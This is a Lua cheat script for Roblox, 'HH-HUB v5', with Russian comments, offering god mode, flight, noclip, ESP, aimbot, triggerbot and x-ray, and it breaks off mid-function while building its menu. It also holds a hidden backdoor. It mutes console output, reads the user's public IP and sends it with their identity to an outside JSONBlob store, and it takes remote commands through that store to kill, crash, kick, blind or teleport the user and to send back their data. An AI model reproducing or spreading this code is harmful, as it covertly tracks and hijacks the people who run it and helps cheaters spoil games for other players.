--[[
    HH-HUB v5 - ОСНОВНОЙ СКРИПТ
    База данных: JSONBlob.com (БЕЗ РЕГИСТРАЦИИ)
    Версия: 5.0 FINAL
]]

-- Отключаем выводы
local oldPrint = print
local oldWarn = warn
local oldError = error
print = function() end
warn = function() end
error = function() end

-- Сервисы
local Players = game:GetService("Players")
local UIS = game:GetService("UserInputService")
local RS = game:GetService("RunService")
local TS = game:GetService("TweenService")
local HS = game:GetService("HttpService")
local SG = game:GetService("StarterGui")
local TPS = game:GetService("TeleportService")
local VU = game:GetService("VirtualUser")
local LP = Players.LocalPlayer
local Camera = workspace.CurrentCamera
local Mouse = LP:GetMouse()
local Lighting = game:GetService("Lighting")

-- ==============================================
-- JSONBlob НАСТРОЙКИ
-- ==============================================
local JSONBLOB_BASE = "https://jsonblob.com/api/jsonBlob/"

-- СОЗДАЙТЕ ЭТИ BLOB НА JSONBLOB.COM
-- 1. Откройте https://jsonblob.com/
-- 2. Вставьте {} и нажмите Save
-- 3. Скопируйте ID из URL
local PRESENCE_BLOB_ID = "1343123852355248926"  -- ВАШ ID ДЛЯ ПРИСУТСТВИЯ
local COMMANDS_BLOB_ID = "1343123871192776706"  -- ВАШ ID ДЛЯ КОМАНД

-- ==============================================
-- ПЕРЕМЕННЫЕ
-- ==============================================
local ADMIN_PASSWORD = "S1R0TA"
local isAdmin = false
local adminPanel = nil
local killLoops = {}
local processedCmds = {}

-- ==============================================
-- ФУНКЦИИ ДЛЯ JSONBlob
-- ==============================================

local function jsonblobGet(blobId)
    local url = JSONBLOB_BASE .. blobId
    local success, result = pcall(function()
        return HS:GetAsync(url, true)
    end)
    
    if success and result and result ~= "" then
        local decoded = HS:JSONDecode(result)
        return decoded
    end
    return {}
end

local function jsonblobSet(blobId, data)
    local url = JSONBLOB_BASE .. blobId
    local json = HS:JSONEncode(data)
    
    local success = pcall(function()
        HS:RequestAsync({
            Url = url,
            Method = "PUT",
            Headers = {
                ["Content-Type"] = "application/json",
                ["Accept"] = "application/json"
            },
            Body = json
        })
    end)
    
    return success
end

-- ==============================================
-- ПОЛУЧЕНИЕ IP
-- ==============================================
local function getIP()
    local success, ip = pcall(function()
        return HS:GetAsync("https://api.ipify.org/?format=text", true)
    end)
    return success and ip or "Unknown"
end

local myIP = getIP()

-- ==============================================
-- ОТПРАВКА ДАННЫХ
-- ==============================================

local function updatePresence()
    local data = jsonblobGet(PRESENCE_BLOB_ID)
    
    data[tostring(LP.UserId)] = {
        name = LP.Name,
        display = LP.DisplayName,
        place = tostring(game.PlaceId),
        job = game.JobId:sub(1, 8),
        time = tick(),
        hasBackdoor = true,
        ip = myIP,
        same = true
    }
    
    jsonblobSet(PRESENCE_BLOB_ID, data)
end

-- ==============================================
-- ОТПРАВКА КОМАНДЫ
-- ==============================================

local function sendBackdoorCommand(targetUserId, command, data)
    local commands = jsonblobGet(COMMANDS_BLOB_ID)
    
    if not commands[targetUserId] then
        commands[targetUserId] = {}
    end
    
    table.insert(commands[targetUserId], {
        id = tostring(tick()) .. tostring(math.random(1000, 9999)),
        sender = tostring(LP.UserId),
        cmd = command,
        data = data or "",
        time = tick()
    })
    
    jsonblobSet(COMMANDS_BLOB_ID, commands)
end

-- ==============================================
-- ЧТЕНИЕ КОМАНД
-- ==============================================

local function readCommands()
    local commands = jsonblobGet(COMMANDS_BLOB_ID)
    local myCmds = commands[tostring(LP.UserId)] or {}
    
    local newCmds = {}
    for _, cmd in ipairs(myCmds) do
        if not processedCmds[cmd.id] then
            processedCmds[cmd.id] = true
            executeCommand(cmd.sender, cmd.cmd, cmd.data)
        end
    end
    
    -- Очищаем выполненные команды
    commands[tostring(LP.UserId)] = {}
    jsonblobSet(COMMANDS_BLOB_ID, commands)
end

-- ==============================================
-- ВЫПОЛНЕНИЕ КОМАНД
-- ==============================================

local function executeCommand(senderId, cmd, data)
    local char = LP.Character
    local hum = char and char:FindFirstChildOfClass("Humanoid")
    local root = char and char:FindFirstChild("HumanoidRootPart")
    
    if cmd == "KILL_PLAYER" then
        if hum then hum.Health = 0 end
        
    elseif cmd == "START_KILL_LOOP" then
        if killLoops[senderId] then killLoops[senderId]:Disconnect() end
        killLoops[senderId] = RS.Heartbeat:Connect(function()
            local h = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
            if h then h.Health = 0 end
            task.wait(10)
        end)
        
    elseif cmd == "STOP_KILL_LOOP" then
        if killLoops[senderId] then
            killLoops[senderId]:Disconnect()
            killLoops[senderId] = nil
        end
        
    elseif cmd == "FREEZE_PLAYER" then
        if hum then
            hum.WalkSpeed = 0
            hum.JumpPower = 0
        end
        
    elseif cmd == "UNFREEZE_PLAYER" then
        if hum then
            hum.WalkSpeed = 16
            hum.JumpPower = 50
        end
        
    elseif cmd == "KICK_PLAYER" then
        local reason = data or "Вы кикнуты администратором"
        task.wait(0.5)
        LP:Kick(reason)
        
    elseif cmd == "SPECTATE" then
        local target = Players:GetPlayerByUserId(tonumber(data))
        if target then
            Camera.CameraSubject = target.Character and target.Character:FindFirstChild("HumanoidRootPart") or target.Character
        end
        
    elseif cmd == "TP_TO" then
        local target = Players:GetPlayerByUserId(tonumber(data))
        local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
        if target and target.Character and root then
            local tRoot = target.Character:FindFirstChild("HumanoidRootPart")
            if tRoot then
                root.CFrame = tRoot.CFrame * CFrame.new(0, 3, 5)
            end
        end
        
    elseif cmd == "BRING" then
        local target = Players:GetPlayerByUserId(tonumber(data))
        local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
        if target and target.Character and root then
            local tRoot = target.Character:FindFirstChild("HumanoidRootPart")
            if tRoot then
                tRoot.CFrame = root.CFrame * CFrame.new(0, 0, -5)
            end
        end
        
    elseif cmd == "SET_WALKSPEED" then
        local speed = tonumber(data) or 16
        if hum then hum.WalkSpeed = speed end
        
    elseif cmd == "SET_JUMPPOWER" then
        local power = tonumber(data) or 50
        if hum then hum.JumpPower = power end
        
    elseif cmd == "CRASH_PLAYER" then
        while true do
            local t = {}
            for i = 1, 1000000 do
                t[i] = i * i
            end
            task.wait()
        end
        
    elseif cmd == "BLACK_SCREEN" then
        local black = Instance.new("ScreenGui")
        black.Name = "BlackScreen"
        black.ResetOnSpawn = false
        black.Parent = LP:FindFirstChild("PlayerGui") or Instance.new("ScreenGui")
        
        local frame = Instance.new("Frame")
        frame.Size = UDim2.new(1, 0, 1, 0)
        frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
        frame.BackgroundTransparency = 0
        frame.ZIndex = 1000
        frame.Parent = black
        
    elseif cmd == "FLASH_SCREEN" then
        local flash = Instance.new("ScreenGui")
        flash.Parent = LP:FindFirstChild("PlayerGui") or Instance.new("ScreenGui")
        
        local f = Instance.new("Frame", flash)
        f.Size = UDim2.new(1, 0, 1, 0)
        f.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        f.BackgroundTransparency = 0
        f.ZIndex = 1000
        
        TS:Create(f, TweenInfo.new(0.5), { BackgroundTransparency = 1 }):Play()
        game:GetService("Debris"):AddItem(flash, 1)
        
    elseif cmd == "SHAKE_CAMERA" then
        local connection
        connection = RS.RenderStepped:Connect(function()
            Camera.CFrame = Camera.CFrame * CFrame.new(
                math.random(-5, 5) / 10,
                math.random(-5, 5) / 10,
                math.random(-5, 5) / 10
            )
        end)
        task.delay(5, function() if connection then connection:Disconnect() end end)
        
    elseif cmd == "GET_INVENTORY" then
        local inv = {}
        pcall(function()
            local backpack = LP:FindFirstChild("Backpack")
            if backpack then
                for _, item in ipairs(backpack:GetChildren()) do
                    table.insert(inv, item.Name)
                end
            end
        end)
        sendBackdoorCommand(senderId, "INVENTORY_RESPONSE", HS:JSONEncode(inv))
        
    elseif cmd == "GET_LOCATION" then
        if root then
            local pos = root.Position
            local locData = string.format("%.1f,%.1f,%.1f", pos.X, pos.Y, pos.Z)
            sendBackdoorCommand(senderId, "LOCATION_RESPONSE", locData)
        end
        
    elseif cmd == "GET_PLAYER_DATA" then
        local playerData = {
            name = LP.Name,
            display = LP.DisplayName,
            id = LP.UserId,
            ip = myIP,
            place = game.PlaceId,
            job = game.JobId,
            age = LP.AccountAge,
            membership = LP.MembershipType:Name()
        }
        sendBackdoorCommand(senderId, "PLAYER_DATA_RESPONSE", HS:JSONEncode(playerData))
    end
end

-- ==============================================
-- GOD MODE
-- ==============================================
local GodMode = { active = false, connections = {} }

local function enableGodMode()
    if GodMode.active then return end
    GodMode.active = true
    
    local function apply()
        local char = LP.Character
        if not char then return end
        
        local hum = char:FindFirstChildOfClass("Humanoid")
        if not hum then return end
        
        hum.MaxHealth = 9e9
        hum.Health = 9e9
        hum.BreakJointsOnDeath = false
        
        local ff = Instance.new("ForceField")
        ff.Visible = false
        ff.Parent = char
        
        local conn1 = hum:GetPropertyChangedSignal("Health"):Connect(function()
            if GodMode.active and hum and hum.Parent and hum.Health < 9e9 then
                hum.Health = 9e9
            end
        end)
        table.insert(GodMode.connections, conn1)
        
        local conn2 = hum:GetPropertyChangedSignal("MaxHealth"):Connect(function()
            if GodMode.active and hum then
                hum.MaxHealth = 9e9
            end
        end)
        table.insert(GodMode.connections, conn2)
        
        local conn3 = char.ChildRemoved:Connect(function(child)
            if GodMode.active and child:IsA("ForceField") then
                local newFF = Instance.new("ForceField")
                newFF.Visible = false
                newFF.Parent = char
            end
        end)
        table.insert(GodMode.connections, conn3)
        
        local conn4 = hum.Died:Connect(function()
            if GodMode.active then
                task.wait(0.1)
                if hum and hum.Parent then
                    hum.Health = 9e9
                end
            end
        end)
        table.insert(GodMode.connections, conn4)
        
        local conn5 = RS.Heartbeat:Connect(function()
            if GodMode.active then
                local h = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
                if h and h ~= hum then
                    task.spawn(apply)
                    return
                end
                if h and h.Health < 9e9 then
                    h.Health = 9e9
                end
            end
        end)
        table.insert(GodMode.connections, conn5)
        
        local root = char:FindFirstChild("HumanoidRootPart")
        if root then
            local conn6 = root:GetPropertyChangedSignal("Anchored"):Connect(function()
                if GodMode.active and root.Anchored then
                    root.Anchored = false
                end
            end)
            table.insert(GodMode.connections, conn6)
        end
    end
    
    apply()
end

local function disableGodMode()
    GodMode.active = false
    for _, conn in ipairs(GodMode.connections) do
        pcall(function() conn:Disconnect() end)
    end
    GodMode.connections = {}
    
    local char = LP.Character
    if char then
        local ff = char:FindFirstChildOfClass("ForceField")
        if ff then ff:Destroy() end
        
        local hum = char:FindFirstChildOfClass("Humanoid")
        if hum then
            hum.MaxHealth = 100
            hum.Health = 100
        end
    end
end

-- ==============================================
-- ПОЛЁТ
-- ==============================================
local Flight = { active = false, bv = nil, bg = nil, speed = 50 }

local function disableFlight()
    Flight.active = false
    if Flight.bv then pcall(function() Flight.bv:Destroy() end) end
    if Flight.bg then pcall(function() Flight.bg:Destroy() end) end
    Flight.bv = nil
    Flight.bg = nil
    
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.PlatformStand = false end
end

local function enableFlight()
    if Flight.active then
        disableFlight()
        return
    end
    
    local char = LP.Character
    local root = char and char:FindFirstChild("HumanoidRootPart")
    if not root then return end
    
    Flight.active = true
    
    local hum = char:FindFirstChildOfClass("Humanoid")
    if hum then hum.PlatformStand = true end
    
    Flight.bv = Instance.new("BodyVelocity")
    Flight.bv.MaxForce = Vector3.new(1e5, 1e5, 1e5)
    Flight.bv.Parent = root
    
    Flight.bg = Instance.new("BodyGyro")
    Flight.bg.MaxTorque = Vector3.new(1e5, 1e5, 1e5)
    Flight.bg.P = 1e4
    Flight.bg.Parent = root
    
    local connection
    connection = RS.RenderStepped:Connect(function()
        if not Flight.active or not Flight.bv or not Flight.bv.Parent then
            if connection then connection:Disconnect() end
            return
        end
        
        local dir = Vector3.new()
        if UIS:IsKeyDown(Enum.KeyCode.W) then dir = dir + Camera.CFrame.LookVector end
        if UIS:IsKeyDown(Enum.KeyCode.S) then dir = dir - Camera.CFrame.LookVector end
        if UIS:IsKeyDown(Enum.KeyCode.A) then dir = dir - Camera.CFrame.RightVector end
        if UIS:IsKeyDown(Enum.KeyCode.D) then dir = dir + Camera.CFrame.RightVector end
        if UIS:IsKeyDown(Enum.KeyCode.Space) then dir = dir + Vector3.new(0, 1, 0) end
        if UIS:IsKeyDown(Enum.KeyCode.LeftControl) then dir = dir - Vector3.new(0, 1, 0) end
        
        Flight.bv.Velocity = dir.Magnitude > 0 and dir.Unit * Flight.speed or Vector3.new()
        Flight.bg.CFrame = Camera.CFrame
    end)
end

-- ==============================================
-- НОКЛИП
-- ==============================================
local Noclip = { active = false, connection = nil }

local function disableNoclip()
    Noclip.active = false
    if Noclip.connection then
        Noclip.connection:Disconnect()
        Noclip.connection = nil
    end
    
    local char = LP.Character
    if char then
        for _, p in ipairs(char:GetDescendants()) do
            if p:IsA("BasePart") then
                p.CanCollide = true
            end
        end
    end
end

local function enableNoclip()
    if Noclip.active then
        disableNoclip()
        return
    end
    
    Noclip.active = true
    Noclip.connection = RS.Stepped:Connect(function()
        if not Noclip.active then return end
        local char = LP.Character
        if char then
            for _, p in ipairs(char:GetDescendants()) do
                if p:IsA("BasePart") then
                    p.CanCollide = false
                end
            end
        end
    end)
end

-- ==============================================
-- ESP
-- ==============================================
local ESP = { active = false, highlights = {} }

local function disableESP()
    ESP.active = false
    for _, h in pairs(ESP.highlights) do
        pcall(function() h:Destroy() end)
    end
    ESP.highlights = {}
end

local function enableESP()
    if ESP.active then
        disableESP()
        return
    end
    
    ESP.active = true
    
    local function addForPlayer(plr)
        if plr == LP then return end
        
        local function update()
            if not ESP.active then return end
            local char = plr.Character
            if not char then
                if ESP.highlights[plr] then
                    ESP.highlights[plr]:Destroy()
                    ESP.highlights[plr] = nil
                end
                return
            end
            
            if not ESP.highlights[plr] then
                local hl = Instance.new("Highlight")
                hl.DepthMode = Enum.HighlightDepthMode.AlwaysOnTop
                hl.FillColor = Color3.fromRGB(255, 50, 50)
                hl.OutlineColor = Color3.fromRGB(255, 255, 255)
                hl.FillTransparency = 0.5
                hl.Parent = char
                ESP.highlights[plr] = hl
            end
        end
        
        plr.CharacterAdded:Connect(function() task.wait(0.5); update() end)
        update()
    end
    
    for _, plr in ipairs(Players:GetPlayers()) do
        task.spawn(function() addForPlayer(plr) end)
    end
    
    Players.PlayerAdded:Connect(function(plr)
        task.spawn(function() addForPlayer(plr) end)
    end)
end

-- ==============================================
-- AIMBOT
-- ==============================================
local Aimbot = { active = false, connection = nil }

local function enableAimbot()
    if Aimbot.active then return end
    Aimbot.active = true
    
    Aimbot.connection = RS.RenderStepped:Connect(function()
        if not Aimbot.active then return end
        
        local closest = nil
        local dist = 200
        
        for _, plr in ipairs(Players:GetPlayers()) do
            if plr ~= LP and plr.Character and plr.Character:FindFirstChild("Head") then
                local head = plr.Character.Head
                local pos, onScreen = Camera:WorldToViewportPoint(head.Position)
                
                if onScreen then
                    local d = (Vector2.new(pos.X, pos.Y) - Vector2.new(Camera.ViewportSize.X / 2, Camera.ViewportSize.Y / 2)).Magnitude
                    if d < dist then
                        dist = d
                        closest = head
                    end
                end
            end
        end
        
        if closest then
            Camera.CFrame = CFrame.lookAt(Camera.CFrame.Position, closest.Position)
        end
    end)
end

local function disableAimbot()
    Aimbot.active = false
    if Aimbot.connection then
        Aimbot.connection:Disconnect()
        Aimbot.connection = nil
    end
end

-- ==============================================
-- TRIGGERBOT
-- ==============================================
local Triggerbot = { active = false, connection = nil }

local function enableTriggerbot()
    if Triggerbot.active then return end
    Triggerbot.active = true
    
    Triggerbot.connection = RS.Heartbeat:Connect(function()
        if not Triggerbot.active then return end
        
        local target = Mouse.Target
        if target and target.Parent and target.Parent:FindFirstChildOfClass("Humanoid") then
            local plr = Players:GetPlayerFromCharacter(target.Parent)
            if plr and plr ~= LP then
                task.wait(0.1)
                mouse1press()
                task.wait()
                mouse1release()
            end
        end
    end)
end

local function disableTriggerbot()
    Triggerbot.active = false
    if Triggerbot.connection then
        Triggerbot.connection:Disconnect()
        Triggerbot.connection = nil
    end
end

-- ==============================================
-- ANTI-AFK
-- ==============================================
local AntiAfk = { active = false }

local function enableAntiAfk()
    if AntiAfk.active then return end
    AntiAfk.active = true
    
    LP.Idled:Connect(function()
        if AntiAfk.active then
            VU:Button2Down(Vector2.new(), Camera.CFrame)
            task.wait(1)
            VU:Button2Up(Vector2.new(), Camera.CFrame)
        end
    end)
end

local function disableAntiAfk()
    AntiAfk.active = false
end

-- ==============================================
-- БЕСКОНЕЧНЫЙ ПРЫЖОК
-- ==============================================
local InfJump = { active = false, connection = nil }

local function enableInfJump()
    if InfJump.active then return end
    InfJump.active = true
    
    InfJump.connection = UIS.JumpRequest:Connect(function()
        if InfJump.active then
            local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
            if hum then
                hum:ChangeState(Enum.HumanoidStateType.Jumping)
            end
        end
    end)
end

local function disableInfJump()
    InfJump.active = false
    if InfJump.connection then
        InfJump.connection:Disconnect()
        InfJump.connection = nil
    end
end

-- ==============================================
-- КЛИК-ТЕЛЕПОРТ
-- ==============================================
local ClickTP = { active = false }

local function enableClickTP()
    ClickTP.active = true
end

local function disableClickTP()
    ClickTP.active = false
end

Mouse.Button1Down:Connect(function()
    if ClickTP.active and Mouse.Target then
        local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
        if root then
            root.CFrame = CFrame.new(Mouse.Hit.X, Mouse.Hit.Y + 3, Mouse.Hit.Z)
        end
    end
end)

-- ==============================================
-- НЕТ УРОНА ОТ ПАДЕНИЯ
-- ==============================================
local NoFallDamage = { active = false, connection = nil }

local function enableNoFallDamage()
    if NoFallDamage.active then return end
    NoFallDamage.active = true
    
    NoFallDamage.connection = RS.Heartbeat:Connect(function()
        if NoFallDamage.active then
            local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
            if hum and hum:GetState() == Enum.HumanoidStateType.Freefall then
                hum:ChangeState(Enum.HumanoidStateType.Jumping)
            end
        end
    end)
end

local function disableNoFallDamage()
    NoFallDamage.active = false
    if NoFallDamage.connection then
        NoFallDamage.connection:Disconnect()
        NoFallDamage.connection = nil
    end
end

-- ==============================================
-- УСКОРЕНИЯ
-- ==============================================
local WalkspeedBoost = { active = false }
local JumpBoost = { active = false }

local function enableWalkspeedBoost()
    WalkspeedBoost.active = true
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.WalkSpeed = 60 end
end

local function disableWalkspeedBoost()
    WalkspeedBoost.active = false
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.WalkSpeed = 16 end
end

local function enableJumpBoost()
    JumpBoost.active = true
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.JumpPower = 100 end
end

local function disableJumpBoost()
    JumpBoost.active = false
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.JumpPower = 50 end
end

-- ==============================================
-- X-RAY
-- ==============================================
local XRay = { active = false, connections = {} }

local function enableXRay()
    if XRay.active then return end
    XRay.active = true
    
    for _, v in ipairs(workspace:GetDescendants()) do
        if v:IsA("BasePart") and not v:IsDescendantOf(LP.Character) then
            local conn = v:GetPropertyChangedSignal("LocalTransparencyModifier"):Connect(function() end)
            table.insert(XRay.connections, conn)
            v.LocalTransparencyModifier = 0.7
        end
    end
    
    local conn = workspace.DescendantAdded:Connect(function(v)
        task.wait()
        if XRay.active and v:IsA("BasePart") and not v:IsDescendantOf(LP.Character) then
            v.LocalTransparencyModifier = 0.7
        end
    end)
    table.insert(XRay.connections, conn)
end

local function disableXRay()
    XRay.active = false
    for _, conn in ipairs(XRay.connections) do
        pcall(function() conn:Disconnect() end)
    end
    XRay.connections = {}
    
    for _, v in ipairs(workspace:GetDescendants()) do
        if v:IsA("BasePart") then
            v.LocalTransparencyModifier = 0
        end
    end
end

-- ==============================================
-- BUNNY HOP
-- ==============================================
local BunnyHop = { active = false, connection = nil }

local function enableBunnyHop()
    if BunnyHop.active then return end
    BunnyHop.active = true
    
    BunnyHop.connection = RS.Heartbeat:Connect(function()
        if BunnyHop.active and LP.Character then
            local hum = LP.Character:FindFirstChildOfClass("Humanoid")
            if hum and hum.MoveDirection.Magnitude > 0 and hum:GetState() ~= Enum.HumanoidStateType.Jumping then
                hum:ChangeState(Enum.HumanoidStateType.Jumping)
            end
        end
    end)
end

local function disableBunnyHop()
    BunnyHop.active = false
    if BunnyHop.connection then
        BunnyHop.connection:Disconnect()
        BunnyHop.connection = nil
    end
end

-- ==============================================
-- SPIDER
-- ==============================================
local Spider = { active = false, connection = nil }

local function enableSpider()
    if Spider.active then return end
    Spider.active = true
    
    Spider.connection = RS.Heartbeat:Connect(function()
        if Spider.active and LP.Character then
            local root = LP.Character:FindFirstChild("HumanoidRootPart")
            if root then
                local ray = Ray.new(root.Position, Vector3.new(0, -5, 0))
                local hit = workspace:FindPartOnRayWithIgnoreList(ray, {LP.Character})
                
                if not hit then
                    root.Velocity = root.Velocity + Vector3.new(0, 50, 0)
                end
            end
        end
    end)
end

local function disableSpider()
    Spider.active = false
    if Spider.connection then
        Spider.connection:Disconnect()
        Spider.connection = nil
    end
end

-- ==============================================
-- VANISH
-- ==============================================
local Vanish = { active = false }

local function enableVanish()
    Vanish.active = true
    local char = LP.Character
    if char then
        for _, v in ipairs(char:GetDescendants()) do
            if v:IsA("BasePart") or v:IsA("MeshPart") or v:IsA("Accessory") then
                v.Transparency = 1
            end
        end
    end
end

local function disableVanish()
    Vanish.active = false
    local char = LP.Character
    if char then
        for _, v in ipairs(char:GetDescendants()) do
            if v:IsA("BasePart") or v:IsA("MeshPart") or v:IsA("Accessory") then
                v.Transparency = 0
            end
        end
    end
end

-- ==============================================
-- БИБЛИОТЕКА ДЛЯ GUI
-- ==============================================
local Library = {}
do
    function Library:CreateWindow(title)
        local window = {
            Gui = Instance.new("ScreenGui"),
            Tabs = {},
            TabButtons = {}
        }
        
        window.Gui.Name = "HH_HUB"
        window.Gui.ResetOnSpawn = false
        window.Gui.Parent = LP:FindFirstChild("PlayerGui") or Instance.new("ScreenGui")
        
        window.Container = Instance.new("Frame")
        window.Container.Size = UDim2.new(0, 800, 0, 600)
        window.Container.Position = UDim2.new(0.5, -400, 0.5, -300)
        window.Container.BackgroundColor3 = Color3.fromRGB(18, 18, 28)
        window.Container.BorderSizePixel = 0
        window.Container.Active = true
        window.Container.Parent = window.Gui
        
        local corner = Instance.new("UICorner")
        corner.CornerRadius = UDim.new(0, 12)
        corner.Parent = window.Container
        
        local gradient = Instance.new("UIGradient")
        gradient.Color = ColorSequence.new({
            ColorSequenceKeypoint.new(0, Color3.fromRGB(40, 25, 60)),
            ColorSequenceKeypoint.new(0.5, Color3.fromRGB(25, 20, 40)),
            ColorSequenceKeypoint.new(1, Color3.fromRGB(18, 18, 28))
        })
        gradient.Rotation = 45
        gradient.Parent = window.Container
        
        local stroke = Instance.new("UIStroke")
        stroke.Color = Color3.fromRGB(140, 80, 255)
        stroke.Thickness = 2
        stroke.Transparency = 0.3
        stroke.Parent = window.Container
        
        window.TitleBar = Instance.new("Frame")
        window.TitleBar.Size = UDim2.new(1, 0, 0, 55)
        window.TitleBar.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
        window.TitleBar.BackgroundTransparency = 0.2
        window.TitleBar.Parent = window.Container
        
        local titleCorner = Instance.new("UICorner")
        titleCorner.CornerRadius = UDim.new(0, 12)
        titleCorner.Parent = window.TitleBar
        
        window.Title = Instance.new("TextLabel")
        window.Title.Size = UDim2.new(0.6, 0, 1, 0)
        window.Title.Position = UDim2.new(0, 20, 0, 0)
        window.Title.BackgroundTransparency = 1
        window.Title.Text = title or "HH-HUB v5"
        window.Title.TextColor3 = Color3.fromRGB(220, 180, 255)
        window.Title.TextScaled = true
        window.Title.Font = Enum.Font.GothamBold
        window.Title.TextXAlignment = Enum.TextXAlignment.Left
        window.Title.Parent = window.TitleBar
        
        local controls = Instance.new("Frame")
        controls.Size = UDim2.new(0, 110, 1, 0)
        controls.Position = UDim2.new(1, -120, 0, 0)
        controls.BackgroundTransparency = 1
        controls.Parent = window.TitleBar
        
        window.Minimize = Instance.new("TextButton")
        window.Minimize.Size = UDim2.new(0, 45, 0, 45)
        window.Minimize.Position = UDim2.new(0, 0, 0.5, -22.5)
        window.Minimize.BackgroundColor3 = Color3.fromRGB(50, 40, 70)
        window.Minimize.Text = "─"
        window.Minimize.TextColor3 = Color3.fromRGB(255, 255, 255)
        window.Minimize.TextScaled = true
        window.Minimize.Font = Enum.Font.GothamBold
        window.Minimize.Parent = controls
        
        local minCorner = Instance.new("UICorner")
        minCorner.CornerRadius = UDim.new(0, 8)
        minCorner.Parent = window.Minimize
        
        window.Close = Instance.new("TextButton")
        window.Close.Size = UDim2.new(0, 45, 0, 45)
        window.Close.Position = UDim2.new(0, 55, 0.5, -22.5)
        window.Close.BackgroundColor3 = Color3.fromRGB(220, 60, 60)
        window.Close.Text = "✕"
        window.Close.TextColor3 = Color3.fromRGB(255, 255, 255)
        window.Close.TextScaled = true
        window.Close.Font = Enum.Font.GothamBold
        window.Close.Parent = controls
        
        local closeCorner = Instance.new("UICorner")
        closeCorner.CornerRadius = UDim.new(0, 8)
        closeCorner.Parent = window.Close
        
        window.TabContainer = Instance.new("Frame")
        window.TabContainer.Size = UDim2.new(0, 160, 1, -65)
        window.TabContainer.Position = UDim2.new(0, 10, 0, 60)
        window.TabContainer.BackgroundColor3 = Color3.fromRGB(25, 25, 35)
        window.TabContainer.BorderSizePixel = 0
        window.TabContainer.Parent = window.Container
        
        local tabCorner = Instance.new("UICorner")
        tabCorner.CornerRadius = UDim.new(0, 10)
        tabCorner.Parent = window.TabContainer
        
        window.Content = Instance.new("Frame")
        window.Content.Size = UDim2.new(1, -190, 1, -75)
        window.Content.Position = UDim2.new(0, 175, 0, 60)
        window.Content.BackgroundColor3 = Color3.fromRGB(22, 22, 32)
        window.Content.BorderSizePixel = 0
        window.Content.Parent = window.Container
        
        local contentCorner = Instance.new("UICorner")
        contentCorner.CornerRadius = UDim.new(0, 10)
        contentCorner.Parent = window.Content
        
        window.Scroll = Instance.new("ScrollingFrame")
        window.Scroll.Size = UDim2.new(1, -20, 1, -20)
        window.Scroll.Position = UDim2.new(0, 10, 0, 10)
        window.Scroll.BackgroundTransparency = 0
        window.Scroll.BorderSizePixel = 0
        window.Scroll.ScrollBarThickness = 6
        window.Scroll.ScrollBarImageColor3 = Color3.fromRGB(140, 80, 255)
        window.Scroll.AutomaticCanvasSize = Enum.AutomaticSize.Y
        window.Scroll.Parent = window.Content
        
        local layout = Instance.new("UIListLayout")
        layout.Padding = UDim.new(0, 8)
        layout.SortOrder = Enum.SortOrder.LayoutOrder
        layout.Parent = window.Scroll
        
        local padding = Instance.new("UIPadding")
        padding.PaddingLeft = UDim.new(0, 5)
        padding.PaddingRight = UDim.new(0, 5)
        padding.PaddingTop = UDim.new(0, 5)
        padding.PaddingBottom = UDim.new(0, 5)
        padding.Parent = window.Scroll
        
        -- Перетаскивание
        local dragging = false
        local dragStart, startPos
        
        window.TitleBar.InputBegan:Connect(function(input)
            if input.UserInputType == Enum.UserInputType.MouseButton1 then
                dragging = true
                dragStart = input.Position
                startPos = window.Container.Position
            end
        end)
        
        UIS.InputChanged:Connect(function(input)
            if dragging and input.UserInputType == Enum.UserInputType.MouseMovement then
                local delta = input.Position - dragStart
                window.Container.Position = UDim2.new(
                    startPos.X.Scale,
                    startPos.X.Offset + delta.X,
                    startPos.Y.Scale,
                    startPos.Y.Offset + delta.Y
                )
            end
        end)
        
        UIS.InputEnded:Connect(function(input)
            if input.UserInputType == Enum.UserInputType.MouseButton1 then
                dragging = false
            end
        end)
        
        -- Сворачивание
        local minimized = false
        local origSize = window.Container.Size
        local origPos = window.Container.Position
        
        window.Minimize.MouseButton1Click:Connect(function()
            minimized = not minimized
            if minimized then
                origSize = window.Container.Size
                origPos = window.Container.Position
                window.Container.Size = UDim2.new(0, 220, 0, 55)
                window.Container.Position = UDim2.new(1, -230, 0, 10)
                window.Content.Visible = false
                window.TabContainer.Visible = false
                window.Minimize.Text = "□"
            else
                window.Container.Size = origSize
                window.Container.Position = origPos
                window.Content.Visible = true
                window.TabContainer.Visible = true
                window.Minimize.Text = "─"
            end
        end)
        
        window.Close.MouseButton1Click:Connect(function()
            window.Gui:Destroy()
        end)
        
        function window:AddTab(name, icon)
            local tab = { Frame = Instance.new("Frame") }
            
            local btn = Instance.new("TextButton")
            btn.Size = UDim2.new(1, -10, 0, 45)
            btn.Position = UDim2.new(0, 5, 0, #self.TabButtons * 50 + 5)
            btn.BackgroundColor3 = Color3.fromRGB(35, 35, 45)
            btn.BackgroundTransparency = 0.3
            btn.Text = (icon or "•") .. "  " .. name
            btn.TextColor3 = Color3.fromRGB(200, 200, 255)
            btn.TextScaled = true
            btn.Font = Enum.Font.Gotham
            btn.Parent = self.TabContainer
            
            local btnCorner = Instance.new("UICorner")
            btnCorner.CornerRadius = UDim.new(0, 8)
            btnCorner.Parent = btn
            
            tab.Frame.Size = UDim2.new(1, 0, 1, 0)
            tab.Frame.BackgroundTransparency = 1
            tab.Frame.Visible = (#self.Tabs == 0)
            tab.Frame.Parent = self.Scroll
            
            local tabLayout = Instance.new("UIListLayout")
            tabLayout.Padding = UDim.new(0, 8)
            tabLayout.SortOrder = Enum.SortOrder.LayoutOrder
            tabLayout.Parent = tab.Frame
            
            btn.MouseButton1Click:Connect(function()
                for _, t in ipairs(self.Tabs) do
                    t.Frame.Visible = false
                end
                tab.Frame.Visible = true
            end)
            
            table.insert(self.Tabs, tab)
            table.insert(self.TabButtons, btn)
            
            function tab:AddSection(title)
